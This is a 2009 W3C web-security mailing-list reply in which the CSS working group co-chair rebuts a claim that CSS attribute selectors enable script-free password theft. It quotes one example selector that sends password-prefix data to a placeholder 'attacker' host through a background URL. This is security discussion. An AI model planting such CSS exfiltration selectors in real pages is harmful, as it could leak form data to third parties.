- From: Daniel Glazman <daniel@glazman.org>
- Date: Mon, 07 Dec 2009 21:26:25 +0100
- To: public-web-security@w3.org
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.
Not at all. I repeat: not at all.
You are making a confusion here between the value _HTML attribute_ and
the value _DOM attribute_. The former represents the default value of
the input element, and that's VERY unlikely a web author will ever want
to give a default value to a password field; the latter represents the
current value of the field and it's NOT, I repeat NOT, copied to the
HTML attribute.
So your selector above will never react to a character typed into a
password field. It only reacts to the default value of the field...
</Daniel>
--
W3C CSS WG, Co-Chair
Received on Monday, 7 December 2009 20:26:57 UTC